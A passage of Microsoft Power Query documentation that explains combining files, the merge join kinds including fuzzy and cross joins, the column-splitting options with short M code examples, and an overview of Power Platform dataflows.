column that contains the binaries in the Content column and then selecting either:
The Combine files command in the Combine group on the Home tab.
The Combine files icon in the column header of the column that contains [Binary]
values.
When you select any of the Combine files commands, the Combine files dialog box
appears, and the following occurs:
1. Power Query analyzes the example file (by default, the first file in the list) and
determines the correct file connector to use to open that file.
2. The dialog box provides the file connector experience exactly as if you were to
connect directly to that example file.
If you want to use a different file for the example file, you can choose it from
the Example file drop-down menu.
Optional: You can select Skip files with errors to exclude from the final
output any files that result in errors.
In the following image, Power Query has detected that the first file has a .csv file name
extension, so it uses the Text/CSV connector to interpret the file.
Combined files output
After the Combine files process is finished, Power Query automatically performs the
following actions:
1. Creates an example query that performs all the required extraction steps for a
single file. It uses the file that was selected as the example file in the Combine files
dialog box.
This example query has the name Transform Sample file in the Queries pane.
2. Creates a function query that parameterizes the file/binary input to the example
query. The example query and the function query are linked, so that changes to
the example query are reflected in the function query.
3. Applies the function query to the original query with input binaries (for example,
the folder query) so it applies the function query for binary inputs on each row,
and then expands the resulting data extraction as top-level columns.
4. Creates a new group with the prefix Transform file from and the initial query as
the suffix, and organizes all the components used to create these combined files in
that group.
You can easily combine all files within a given folder, as long as they have the same file
type and structure (including the same columns). You can also apply additional
transformation or extraction steps by modifying the automatically generated example
query, without having to worry about modifying or creating additional function query
steps.
7 Note
You can modify the steps inside the example query to change the function applied
to each binary in your query. The example query is linked to the function, so any
changes made to the example query will be reflected in the function query.
If any of the changes affect column names or column data types, be sure to check
the last step of your output query. Adding a Change column type step can
introduce a step-level error that prevents you from visualizing your table. More
information: Dealing with errors
See also
Combine CSV files
Combine CSV files
Article • 02/17/2023
In Power Query, you can combine multiple files from a given data source. This article
describes how the experience works when the files that you want to combine are CSV
files. More information: Combine files overview
Tip
You can follow along with this example by downloading the sample files used in
this article from this download link . You can place those files in the data source
of your choice, such as a local folder, SharePoint folder, Azure Blob storage, Azure
Data Lake Storage, or other data source that provides the file system view.
For simplicity, the example in this article uses the Folder connector. More information:
Folder
There are 12 CSV files, one for each month of the calendar year 2019. The following
image shows the first 15 rows of the file for the month of January.
The number of rows varies from file to file, but all files have a header section in the first
four rows. They have column headers in the fifth row, and the data for the table begins
in the sixth row and continues through all subsequent rows.
The goal is to combine all 12 files into a single table. This combined table contains the
header row at the top of the table, and includes the source name, date, country, units,
and revenue data for the entire year in separate columns after the header row.
Table preview
When connecting to the folder that hosts the files that you want to combine—in this
example, the name of that folder is CSV Files—you're shown the table preview dialog
box, which displays your folder path in the upper-left corner. The data preview shows
the file system view.
7 Note
In a different situation, you might select Transform data to further filter and
transform your data before combining the files. Selecting Combine is only
recommended when you're certain that the folder contains only the files that you
want to combine.
7 Note
Power Query automatically detects what connector to use based on the first file
found in the list. To learn more about the CSV connector, go to Text/CSV.
For this example, leave all the default settings (Example file set to First file, and the
default values for File origin, Delimiter, and Data type detection).
Now select Transform data in the lower-right corner to go to the output query.
Output query
After selecting Transform data in the Combine files dialog box, you'll be taken back to
the Power Query Editor in the query that you initially created from the connection to the
local folder. The output query now contains the source file name in the left-most
column, along with the data from each of the source files in the remaining columns.
However, the data isn't in the correct shape. You need to remove the top four rows from
each file before combining them. To make this change in each file before you combine
them, select the Transform Sample file query in the Queries pane on the left side of
your screen.
The transformations that need to be added to the Transform Sample file query are:
1. Remove top rows: To perform this operation, select the table icon menu in the
upper-left corner of the table, and then select Remove top rows.
In the Remove top rows dialog box, enter 4, and then select OK.
After selecting OK, your table will no longer have the top four rows.
2. Use first row as headers: Select the table icon again, and then select Use first row
as headers.
The result of that operation will promote the first row of the table to the new
column headers.
After this operation is completed, Power Query by default will try to automatically detect
the data types of the columns and add a new Changed column type step.
However, notice that none of the columns derived from the files (Date, Country, Units,
Revenue) have a specific data type assigned to them. Assign the correct data type to
each column by using the following table.
Column name Data type
Date Date
Country Text
Units Whole number
Revenue Currency
After defining the data types for each column, you'll be ready to load the table.
Verification
To validate that all files have been combined, you can select the filter icon on the
Source.Name column heading, which will display all the names of the files that have
been combined. If you get the warning "List may be incomplete," select Load more at
the bottom of the menu to display more available values in the column.
After you select Load more, all available file names will be displayed.
Merge queries overview
Article • 08/30/2023
A merge queries operation joins two existing tables together based on matching values
from one or multiple columns. You can choose to use different types of joins, depending
on the output you want.
Merging queries
You can find the Merge queries command on the Home tab, in the Combine group.
From the drop-down menu, you'll see two options:
Merge queries: Displays the Merge dialog box, with the selected query as the left
table of the merge operation.
Merge queries as new: Displays the Merge dialog box without any preselected
tables for the merge operation.
Left table for merge: The first selection, from top to bottom of your screen.
Right table for merge: The second selection, from top to bottom of your screen.
7 Note
The position—left or right—of the tables becomes very important when you select
the correct join kind to use.
Sales: The CountryID field is a key or an identifier from the Countries table.
Countries: This table contains the CountryID and the name of the country.
The goal is to join these tables by using the CountryID column from both tables, so you
select the CountryID column from each table. After you make the selections, a message
appears with an estimated number of matches at the bottom of the dialog box.
7 Note
Although this example shows the same column header for both tables, this isn't a
requirement for the merge operation. Column headers don't need to match
between tables. However, it's important to note that the columns must be of the
same data type, otherwise the merge operation might not yield correct results.
You can also select multiple columns to perform the join by holding Ctrl as you select
the columns. When you do so, the order in which the columns were selected is
displayed in small numbers next to the column headings, starting with 1.
For this example, you have the Sales and Countries tables. Each of the tables has
CountryID and StateID columns, which you need to pair for the join between both
columns.
First select the CountryID column in the Sales table, select Ctrl, and then select the
StateID column. (This will show the small numbers in the column headings.) Next,
perform the same selections in the Countries table. The following image shows the
result of selecting those columns.
7 Note
When selecting multiple columns for a join, the order you select the columns in
each table must match. For example, the first column selected in the left table is
matched with the first column selected in the right table, and so on. Otherwise,
you'll observe incorrect join results.
There can be many suggestions, but for this scenario the feature suggests only one
mapping: the CountryID column from the Sales table to the CountryID column from the
Countries table. You can select it, and the column-pair mapping will be automatically
applied to your dialog.
7 Note
Only the column-pair-mapping is suggested. Other options in this dialog, such as
the join kind or fuzzy matching configuration, are out of scope for this suggestion.
From here, you can choose to expand or aggregate the fields from this new table
column, which will be the fields from your right table.
7 Note
Currently, the Power Query Online experience only provides the expand operation
in its interface. The option to aggregate will be added later this year.
Join kinds
A join kind specifies how a merge operation will be performed. The following table
describes the available join kinds in Power Query.
Join kind Icon Description
Left outer All rows from the left table, matching rows from the right table
Right outer All rows from the right table, matching rows from the left table
Full outer All rows from both tables
Inner Only matching rows from both tables
Left anti Only rows from the left table with no match in the right table
Right anti Only rows from the right table with no match in the left table
Fuzzy matching
You use fuzzy merge to apply fuzzy matching algorithms when comparing columns, to
try to find matches across the tables you're merging. You can enable this feature by
selecting the Use fuzzy matching to perform the merge check box in the Merge dialog
box. Expand Fuzzy matching options to view all available configurations.
7 Note
Fuzzy matching is only supported for merge operations over text columns.
Left outer join
Article • 12/17/2022
One of the join kinds available in the Merge dialog box in Power Query is a left outer
join, which keeps all the rows from the left table and brings in any matching rows from
the right table. More information: Merge operations overview
This article uses sample data to show how to do a merge operation with the left outer
join. The sample source tables for this example are:
Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.
Countries: This table is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.
Field from the Sales table Field from the Countries table
CountryID id
The goal is to create a table like the following, where the name of the country appears
as a new Country column in the Sales table as long as the CountryID exists in the
Countries table. If there are no matches between the left and right tables, a null value is
the result of the merge for that row. In the following image, this is the case for
CountryID 4, which exists in the Sales table but has no matching row in the Countries table.
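The same walkthrough, expressed directly in M, looks roughly like the following sketch (assuming the queries are named Sales and Countries; the editor's generated steps can differ in naming and type annotations):

let
    // Keep every Sales row and nest any matching Countries rows into a new table column
    Merged = Table.NestedJoin(Sales, {"CountryID"}, Countries, {"id"}, "Countries", JoinKind.LeftOuter),
    // Expand only the Country field; Sales rows without a match get null
    Expanded = Table.ExpandTableColumn(Merged, "Countries", {"Country"}, {"Country"})
in
    Expanded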
Right outer join
One of the join kinds available in the Merge dialog box in Power Query is a right outer
join, which keeps all the rows from the right table and brings in any matching rows from
the left table. More information: Merge operations overview
This article uses sample data to show how to do a merge operation with the right outer
join. The sample source tables for this example are:
Sales: This table includes the fields Date, CountryID, and Units. The CountryID is a
whole number value that represents the unique identifier from the Countries table.
Countries: This table is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.
Field from the Sales table Field from the Countries table
CountryID id
The goal is to create a table like the following, where the name of the country appears
as a new Country column in the Sales table. Because of how the right outer join works,
all rows from the right table will be brought in, but only matching rows from the left
table will be kept.
Full outer join
One of the join kinds available in the Merge dialog box in Power Query is a full outer
join, which brings in all the rows from both the left and right tables. More information:
Merge operations overview
This article uses sample data to show how to do a merge operation with the full outer
join. The sample source tables for this example are:
Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.
Countries: This is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.
Field from the Sales table Field from the Countries table
CountryID id
The goal is to create a table like the following, where the name of the country appears
as a new Country column in the Sales table. Because of how the full outer join works, all
rows from both the left and right tables will be brought in, regardless of whether they
only appear in one of the tables.
You can merge on more than one column by selecting and holding Ctrl and then
selecting the columns.
Tip
Take a closer look at the message at the bottom of the dialog box that reads "The
selection matches 4 of 4 rows from the first table, and 3 of 4 rows from the second
table." This message is crucial for understanding the result that you get from this
operation.
In the Countries table, you have the Country Spain with id of 4, but there are no records
for CountryID 4 in the Sales table. That's why only three of four rows from the right
table found a match. All rows from the right table that didn't have matching rows from
the left table will be grouped and shown in a new row in the output table with no values
for the fields from the left table.
From the newly created Countries column after the merge operation, expand the
Country field. Don't select the Use original column name as prefix check box.
After performing this operation, you'll create a table that looks like the following image.
Inner join
Article • 12/17/2022
One of the join kinds available in the Merge dialog box in Power Query is an inner join,
which brings in only matching rows from both the left and right tables. More
information: Merge operations overview
This article uses sample data to show how to do a merge operation with the inner join.
The sample source tables for this example are:
Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.
Countries: This is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.
Field from the Sales table Field from the Countries table
CountryID id
The goal is to create a table like the following, where the name of the country appears
as a new Country column in the Sales table. Because of how the inner join works, only
matching rows from both the left and right tables will be brought in.
Take a closer look at the message at the bottom of the dialog box that reads "The
selection matches 1 of 4 rows from the first table, and 1 of 2 rows from the second
table." This message is crucial to understanding the result that you get from this
operation.
In the Sales table, you have a CountryID of 1 and 2, but neither of these values is
found in the Countries table. That's why the match only found one of four rows in the
left (first) table.
In the Countries table, you have the Country Spain with the id 4, but there are no
records for a CountryID of 4 in the Sales table. That's why only one of two rows from
the right (second) table found a match.
From the newly created Countries column, expand the Country field. Don't select the
Use original column name as prefix check box.
After performing this operation, you'll create a table that looks like the following image.
Left anti join
Article • 12/17/2022
One of the join kinds available in the Merge dialog box in Power Query is a left anti join,
which brings in only rows from the left table that don't have any matching rows from
the right table. More information: Merge operations overview
This article uses sample data to show how to do a merge operation with the left anti
join. The sample source tables for this example are:
Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.
Countries: This table is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.
Field from the Sales table Field from the Countries table
CountryID id
The goal is to create a table like the following, where only the rows from the left table
that don't match any from the right table are kept.
Take a closer look at the message at the bottom of the dialog box that reads "The
selection excludes 1 of 4 rows from the first table." This message is crucial to
understanding the result that you get from this operation.
In the Sales table, you have a CountryID of 1 and 2, but neither of them is found in the
Countries table. That's why the match only found one of four rows in the left (first) table.
In the Countries table, you have the Country Spain with an id of 4, but there are no
records for CountryID 4 in the Sales table. That's why only one of two rows from the
right (second) table found a match.
From the newly created Countries column, expand the Country field. Don't select the
Use original column name as prefix check box.
After doing this operation, you'll create a table that looks like the following image. The
newly expanded Country field doesn't have any values. That's because the left anti join
doesn't bring any values from the right table—it only keeps rows from the left table.
Right anti join
Article • 12/17/2022
One of the join kinds available in the Merge dialog box in Power Query is a right anti
join, which brings in only rows from the right table that don't have any matching rows
from the left table. More information: Merge operations overview
This article uses sample data to show how to do a merge operation with the right anti
join. The sample source tables for this example are:
Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.
Countries: This is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.
Field from the Sales table Field from the Countries table
CountryID id
The goal is to create a table like the following, where only the rows from the right table
that don't match any from the left table are kept. As a common use case, you can find
all the rows that are available in the right table but aren't found in the left table.
Take a closer look at the message at the bottom of the dialog box that reads "The
selection excludes 1 of 2 rows from the second table." This message is crucial to
understanding the result that you get from this operation.
In the Countries table, you have the Country Spain with an id of 4, but there are no
records for CountryID 4 in the Sales table. That's why only one of two rows from the
right (second) table found a match. Because of how the right anti join works, you'll never
see any rows from the left (first) table in the output of this operation.
From the newly created Countries column, expand the Country field. Don't select the
Use original column name as prefix check box.
After performing this operation, you'll create a table that looks like the following image.
The newly expanded Country field doesn't have any values. That's because the right anti
join doesn't bring any values from the left table—it only keeps rows from the right table.
Fuzzy merge
Article • 12/17/2022
Fuzzy merge is a smart data preparation feature you can use to apply fuzzy matching
algorithms when comparing columns, to try to find matches across the tables that are
being merged.
You can enable fuzzy matching at the bottom of the Merge dialog box by selecting the
Use fuzzy matching to perform the merge check box. More information: Merge
operations overview
7 Note
Fuzzy matching is only supported on merge operations over text columns. Power
Query uses the Jaccard similarity algorithm to measure the similarity between pairs
of instances.
Sample scenario
A common use case for fuzzy matching is with freeform text fields, such as in a survey.
For this article, the sample table was taken directly from an online survey sent to a
group with only one question: What is your favorite fruit?
To help standardize these values, in this example you have a Fruits reference table.
7 Note
For simplicity, this Fruits reference table only includes the name of the fruits that
will be needed for this scenario. Your reference table can have as many rows as you
need.
The goal is to create a table like the following, where you've standardized all these
values so you can do more analysis.
Similarity threshold (optional): A value between 0.00 and 1.00 that provides the
ability to match records above a given similarity score. A threshold of 1.00 is the
same as specifying an exact match criteria. For example, Grapes matches with
Graes (missing the letter p) only if the threshold is set to less than 0.90. By default,
this value is set to 0.80.
Ignore case: Allows matching records no matter what the case of the text.
Match by combining text parts: Allows combining text parts to find matches. For
example, Micro soft is matched with Microsoft if this option is enabled.
Show similarity scores: Shows similarity scores between the input values and the
matched values after fuzzy matching.
Number of matches (optional): Specifies the maximum number of matching rows
that can be returned for every input row.
Transformation table (optional): Allows matching records based on custom value
mappings. For example, Grapes is matched with Raisins if a transformation table is
provided where the From column contains Grapes and the To column contains
Raisins.
Transformation table
For the example in this article, you can use a transformation table to map the value that
has a missing pair. That value is apls, which needs to be mapped to Apple. Your
transformation table has two columns:
From To
apls Apple
You can go back to the Merge dialog box, and in Fuzzy matching options under
Number of matches, enter 1. Enable the Show similarity scores option, and then, under
Transformation table, select Transform Table from the drop-down menu.
After you select OK, you can go to the merge step. When you expand the column with
table values, you'll notice that besides the Fruit field you'll also see the Similarity score
field. Select both and expand them without adding a prefix.
After expanding these two fields, they'll be added to your table. Note the values you get
for the similarity scores of each value. These scores can help you with further
transformations if needed to determine if you should lower or raise your similarity
threshold.
For this example, the Similarity score serves only as additional information and isn't
needed in the output of this query, so you can remove it. Note how the example started
with nine distinct values, but after the fuzzy merge, there are only four distinct values.
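Behind the dialog, a fuzzy merge corresponds to Table.FuzzyNestedJoin in M. The following sketch uses hypothetical query and column names (Survey for the responses, Fruits for the reference table, and a Fruit column in each) and shows how the dialog options map to the options record; the exact field names are an assumption, so verify them against the step the editor generates for you:

let
    FuzzyMerged = Table.FuzzyNestedJoin(
        Survey, {"Fruit"},
        Fruits, {"Fruit"},
        "Fruits", JoinKind.LeftOuter,
        [
            Threshold = 0.8,                          // Similarity threshold
            IgnoreCase = true,                        // Ignore case
            NumberOfMatches = 1,                      // Number of matches
            TransformationTable = #"Transform Table"  // From/To custom mappings
        ])
in
    FuzzyMerged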
Cross join
Article • 12/17/2022
A cross join is a type of join that returns the Cartesian product of rows from the tables in
the join. In other words, it combines each row from the first table with each row from
the second table.
This article demonstrates, with a practical example, how to do a cross join in Power
Query.
The sample source tables for this example are:
Product: A table with all the generic products that you sell.
Colors: A table with all the product variations, such as colors, that you can have in your
inventory.
The goal is to perform a cross-join operation with these two tables to create a list of all
unique products that you can have in your inventory, as shown in the following table.
This operation is necessary because the Product table only contains the generic product
name, and doesn't give the level of detail you need to see what product variations (such
as color) there are.
Perform a cross join
To do a cross-join operation in Power Query, first go to the Product table. From the Add
column tab on the ribbon, select Custom column. More information: Add a custom
column
In the Custom column dialog box, enter whatever name you like in the New column
name box, and enter Colors in the Custom column formula box.
) Important
If your query name has spaces in it, such as Product Colors, the text that you need
to enter in the Custom column formula section has to follow the syntax #"Query name".
For Product Colors, you need to enter #"Product Colors".
You can check the name of your queries in the Query settings pane on the right
side of your screen or in the Queries pane on the left side.
After you select OK in the Custom column dialog box, a new column is added to the
table. In the new column heading, select Expand to expand the contents of this newly
created column, and then select OK.
After you select OK, you'll reach your goal of creating a table with all possible
combinations of Product and Colors.
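Expressed in M, the whole cross join is just two steps. A minimal sketch, assuming the queries are named Product and Colors and that the Colors table has a Color column (if a query name contains spaces, quote it as #"Product Colors"):

let
    // For every Product row, add a column whose value is the entire Colors table
    AddedColors = Table.AddColumn(Product, "AllColors", each Colors),
    // Expanding that table column produces every Product and Color combination (the Cartesian product)
    CrossJoined = Table.ExpandTableColumn(AddedColors, "AllColors", {"Color"})
in
    CrossJoined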
Split columns by delimiter
Article • 12/17/2022
In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by a delimiter.
You can find this option in the following places:
Home tab—under the Split column dropdown menu inside the Transform group.
Transform tab—under the Split column dropdown menu inside the Text column
group.
Account number
Account name
In this example, you want to split this column into two columns. The values are
delimited by a space—the first space from left to right. To do this split, select the
column, and then select the option to split the column by a delimiter. In Split Column
by Delimiter, apply the following configuration:
7 Note
Power Query will split the column into as many columns as needed. The name of
the new columns will contain the same name as the original column. A suffix that
includes a dot and a number that represents the split sections of the original
column will be appended to the name of the new columns.
Split columns by delimiter into rows
The Accounts column has values in pairs separated by a comma. These pairs are
separated by a semicolon. The goal of this example is to split this column into new rows
by using the semicolon as the delimiter.
To do that split, select the Accounts column. Select the option to split the column by a
delimiter. In Split Column by Delimiter, apply the following configuration:
Final Split
Your table still requires one last split column operation. You need to split the Accounts
column by the first comma that it finds. This split will create a column for the account
name and another one for the account number.
To do that split, select the Accounts column and then select Split Column > By
Delimiter. Inside the Split column window, apply the following configuration:
The result of that operation will give you a table with the three columns that you're
expecting. You then rename the columns as follows:
Your final table looks like the one in the following image.
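These splits are driven by the Splitter functions in M. The following sketch covers the last two steps of this example under assumed names (a Source step and an Accounts column); the type annotations the editor adds are omitted:

let
    // Split the Accounts column into rows, using the semicolon as the delimiter
    ToRows = Table.ExpandListColumn(
        Table.TransformColumns(Source, {{"Accounts", Splitter.SplitTextByDelimiter(";")}}),
        "Accounts"),
    // Then split each value at the first comma it finds into two columns (rename them afterward)
    FinalSplit = Table.SplitColumn(
        ToRows, "Accounts",
        Splitter.SplitTextByEachDelimiter({","}),
        {"Accounts.1", "Accounts.2"})
in
    FinalSplit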
Split columns by number of characters
Article • 12/17/2022
In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by the number of characters.
You can find this option in the following places:
Home tab—under the Split Column dropdown menu inside the Transform group.
Transform tab—under the Split Column dropdown menu inside the Text Column
group.
In this example, you want to split this column into three columns containing the values
described in the list above.
To do this split, select the column and then select the option to split the column by the
number of characters. In Split column by Number of Characters, apply the following
configuration:
Number of characters: 6
Split: Once, as far left as possible
The result of that operation will give you a table with two columns. One for the account
name and the other one that contains the combined values for the date and units.
7 Note
Power Query will split the column into only two columns. The name of the new
columns will contain the same name as the original column. A suffix containing a
dot and a number that represents the split section of the column will be appended
to the names of the new columns.
Now continue to do the same operation over the new Column1.2 column, but with the
following configuration:
Number of characters: 8
Split: Once, as far left as possible
The result of that operation will yield a table with three columns. Notice the new names
of the two columns on the far right. Column1.2.1 and Column1.2.2 were automatically
created by the split column operation.
You can now change the name of the columns and also define the data types of each
column as follows:
Your final table will look like the one in the following image.
Split columns by number of characters into
rows
The initial table for this example will be the one below, with the columns Group and
Account.
The Account column can hold multiple values in the same cell. Each value has the same
length in characters, with a total of six characters. In this example, you want to split
these values so you can have each account value in its own row.
To do that, select the Account column and then select the option to split the column by
the number of characters. In Split column by Number of Characters, apply the following
configuration:
Number of characters: 6
Split: Repeatedly
Split into: Rows
The result of that operation will give you a table with the same number of columns, but
many more rows because the fragments inside the original cell values in the Account
column are now split into multiple rows.
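In M, this repeated split uses Splitter.SplitTextByRepeatedLengths. A minimal sketch with assumed names (a Source step and the Account column):

let
    // Break each Account value into consecutive six-character pieces
    Pieces = Table.TransformColumns(Source, {{"Account", Splitter.SplitTextByRepeatedLengths(6)}}),
    // Expand the resulting lists so each six-character account value lands on its own row
    ToRows = Table.ExpandListColumn(Pieces, "Account")
in
    ToRows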
Split columns by positions
Article • 12/17/2022
In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by positions.
You can find this option in the following places:
Home tab—under the Split Column dropdown menu inside the Transform group.
Transform tab—under the Split Column dropdown menu inside the Text Column
group.
In this example, you want to split this column into the three columns made from the
values in the list above. To do this split, select the column and then select the option to
split the column by positions. In Split Column by Positions, apply the following
configuration:
Positions: 0,6,14
Positions are zero-based and comma-separated, where position zero is the start
of the string.
7 Note
This operation first creates a column from position 0 up to position 6, then a second
column from position 6 up to position 14. The third column holds any remaining
characters from position 14 onward in the current data preview contents.
The result of that operation will give you a table with three columns.
7 Note
Power Query will split the column into only three columns. The name of the new
columns will contain the same name as the original column. A suffix created by a
dot and a number that represents the split section of the column will be appended
to the name of the new columns.
You can now change the name of the columns, and also define the data types of each
column as follows:
Your final table will look like the one in the following image.
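The equivalent M step is based on Splitter.SplitTextByPositions. A sketch with assumed names (a Source step, a Column1 column, and placeholder output names); the editor also adds column types, which are omitted here:

// Positions are zero-based: pieces start at characters 0, 6, and 14
Table.SplitColumn(
    Source, "Column1",
    Splitter.SplitTextByPositions({0, 6, 14}),
    {"Column1.1", "Column1.2", "Column1.3"})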
Split columns by positions into rows
The Account column can only hold two values in the same cell. Each value has the same
length in characters, with a total of six characters. In this example, you want to split
these values so you can have each account value in its own row. To do that, select the
Account column and then select the option to split the column by positions. In Split
Column by Positions, apply the following configuration:
Positions: 0, 6
Split into: Rows
7 Note
This operation first creates a piece from position 0 up to position 6. Any characters
from position 6 onward form another piece, which appears as an additional row for
values longer than six characters in the current data preview contents.
The result of that operation will give you a table with the same number of columns, but
many more rows because the values inside the cells are now in their own cells.
Split columns by lowercase to uppercase
Article • 02/17/2023
In Power Query, you can split a column through different methods. If your data contains
CamelCased text or a similar pattern, then the column(s) selected can easily be split by
every instance of the last lowercase letter to the next uppercase letter.
You can find this option in the following places:
Home tab—under the Split Column dropdown menu inside the Transform group.
Transform tab—under the Split Column dropdown menu inside the Text Column
group.
This single column will split into multiple columns, given every instance of the last
lowercase letter to the next uppercase letter. In this case, it only splits into two columns.
Split columns by uppercase to lowercase
In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by every instance of the last uppercase letter to the next
lowercase letter.
You can find this option in the following places:
Home tab—under the Split Column dropdown menu inside the Transform group.
Transform tab—under the Split Column dropdown menu inside the Text Column
group.
This single column will split into multiple columns, given every instance of the last
uppercase letter to the next lowercase letter. In this case, it only splits into two columns.
Split columns by digit to non-digit
In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by every instance of a digit followed by a non-digit.
You can find this option in the following places:
Home tab—under the Split Column dropdown menu inside the Transform group.
Transform tab—under the Split Column dropdown menu inside the Text Column
group.
This single column will split into multiple columns, given every instance of a digit
followed by a non-digit. In this case, it only splits into two columns.
Split columns by non-digit to digit
In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by every instance of a non-digit followed by a digit.
You can find this option in the following places:
Home tab—under the Split Column dropdown menu inside the Transform group.
Transform tab—under the Split Column dropdown menu inside the Text Column
group.
In this example, you want to split this column into the two columns described in the list
above. Select the column and then select the option to split the column by non-digit to
digit.
This single column will split into multiple columns, given every instance of a non-digit
followed by a digit. In this case, it only splits into two columns.
Benefits of dataflows
The following list highlights some of the benefits of using dataflows:
A dataflow decouples the data transformation layer from the modeling and
visualization layer in a Power BI solution.
The data transformation code can reside in a central location, a dataflow, rather
than be spread out among multiple artifacts.
A dataflow creator only needs Power Query skills. In an environment with multiple
creators, the dataflow creator can be part of a team that together builds the entire
BI solution or operational application.
A dataflow is product-agnostic. It's not a component of Power BI only; you can get
its data in other tools and services.
Next steps
The following articles provide further study materials for dataflows.
Dataflows are used to extract, transform, and load data to a storage destination where it
can be leveraged for different scenarios. Because not all storage destinations share the
same characteristics, some dataflow features and behaviors differ depending on the
storage destination the dataflow loads data into. Before you create a dataflow, it's
important to understand how the data is going to be used, and choose the storage
destination according to the requirements of your solution.
Standard dataflows
A standard dataflow loads data to Dataverse tables. Standard dataflows can only be
created in Power Apps. One benefit of creating this type of dataflow is that any
application that depends on data in Dataverse can work with the data created by
standard dataflows. Typical applications that leverage Dataverse tables are Power Apps,
Power Automate, AI Builder and Power Virtual Agents.
Standard dataflows versions
We've been working on significant updates to standard dataflows to improve their
performance and reliability. These improvements will eventually be available to all
standard dataflows. But in the interim, we'll differentiate between existing standard
dataflows (version 1) and new standard dataflows (version 2) by adding a version
indicator in Power Apps.
Standard dataflow versions feature comparison
The following table lists the major feature differences between standard dataflows V1
and V2, and provides information about each feature's behavior in each version.
Analytical dataflows
An analytical dataflow loads data to storage types optimized for analytics—Azure Data
Lake Storage. Microsoft Power Platform environments and Power BI workspaces provide
customers with a managed analytical storage location that's bundled with those product
licenses. In addition, customers can link their organization’s Azure Data Lake storage
account as a destination for dataflows.
Analytical dataflows are capable of additional analytical features. For example, they can
integrate with Power BI's AI features or use computed entities, which are discussed later.
You can create analytical dataflows in Power BI. By default, they'll load data to Power BI’s
managed storage. But you can also configure Power BI to store the data in the
organization’s Azure Data Lake Storage.
You can also create analytical dataflows in Power Apps and Dynamics 365 customer
insights portals. When you're creating a dataflow in the Power Apps portal, you can
choose between Dataverse managed analytical storage and your organization's Azure
Data Lake Storage account.
AI Integration
Sometimes, depending on the requirement, you might need to apply some AI and
machine learning functions on the data through the dataflow. These functionalities are
available in Power BI dataflows and require a Premium workspace.
Note that the features listed above are Power BI specific and are not available when
creating a dataflow in the Power Apps or Dynamics 365 customer insights portals.
Computed tables
One of the reasons to use a computed table is the ability to process large amounts of
data. The computed table helps in those scenarios. If you have a table in a dataflow,
and another table in the same dataflow uses the first table's output, this action creates a
computed table.
The computed table helps with the performance of the data transformations. Instead of
re-doing the transformations needed in the first table multiple times, the transformation
is done only once in the computed table. Then the result is used multiple times in other
tables.
AI features—analytical dataflow
If you're planning to use any AI functionality through the data transformation stage,
you'll find it helpful to use an analytical dataflow because you can use all the supported
AI features with this type of dataflow.
Create and use dataflows in Microsoft
Power Platform
Article • 04/06/2023
Using dataflows with Microsoft Power Platform makes data preparation easier, and lets
you reuse your data preparation work in subsequent reports, apps, and models.
In the world of ever-expanding data, data preparation can be difficult and expensive,
consuming as much as 60 to 80 percent of the time and cost for a typical analytics
project. Such projects can require wrangling fragmented and incomplete data, complex
system integration, data with structural inconsistency, and a high skillset barrier.
To make data preparation easier and to help you get more value out of your data, Power
Query and Power Platform dataflows were created.
With dataflows, Microsoft brings the self-service data preparation capabilities of Power
Query into the Power BI and Power Apps online services, and expands existing
capabilities in the following ways:
Self-service data prep for big data with dataflows: Dataflows can be used to
easily ingest, cleanse, transform, integrate, enrich, and schematize data from a
large and ever-growing array of transactional and observational sources,
encompassing all data preparation logic. Previously, extract, transform, load (ETL)
logic could only be included within datasets in Power BI, copied over and over
between datasets, and bound to dataset management settings.
With dataflows, ETL logic is elevated to a first-class artifact within Microsoft Power
Platform services, and includes dedicated authoring and management experiences.
Business analysts, BI professionals, and data scientists can use dataflows to handle
the most complex data preparation challenges and build on each other's work,
thanks to a revolutionary model-driven calculation engine, which takes care of all
the transformation and dependency logic—cutting time, cost, and expertise to a
fraction of what's traditionally been required for those tasks. You can create
dataflows by using the well-known, self-service data preparation experience of
Power Query. Dataflows are created and easily managed in app workspaces or
environments, in Power BI or Power Apps, respectively, enjoying all the capabilities
these services have to offer, such as permission management and scheduled
refreshes.
Load data to Dataverse or Azure Data Lake Storage: Depending on your use case,
you can store data prepared by Power Platform dataflows in the Dataverse or your
organization's Azure Data Lake Storage account:
Dataverse lets you securely store and manage data that's used by business
applications. Data within Dataverse is stored in a set of tables. A table is a set of
rows (formerly referred to as records) and columns (formerly referred to as
fields/attributes). Each column in the table is designed to store a certain type of
data, for example, name, age, salary, and so on. Dataverse includes a base set of
standard tables that cover typical scenarios, but you can also create custom
tables specific to your organization and populate them with data by using
dataflows. App makers can then use Power Apps and Power Automate to build
rich applications that use this data.
Azure Data Lake Storage lets you collaborate with people in your organization
using Power BI, Azure Data, and AI services, or using custom-built Line of
Business Applications that read data from the lake. Dataflows that load data to
an Azure Data Lake Storage account store data in Common Data Model folders.
Common Data Model folders contain schematized data and metadata in a
standardized format, to facilitate data exchange and to enable full
interoperability across services that produce or consume data stored in an
organization’s Azure Data Lake Storage account as the shared storage layer.
Advanced Analytics and AI with Azure: Power Platform dataflows store data in
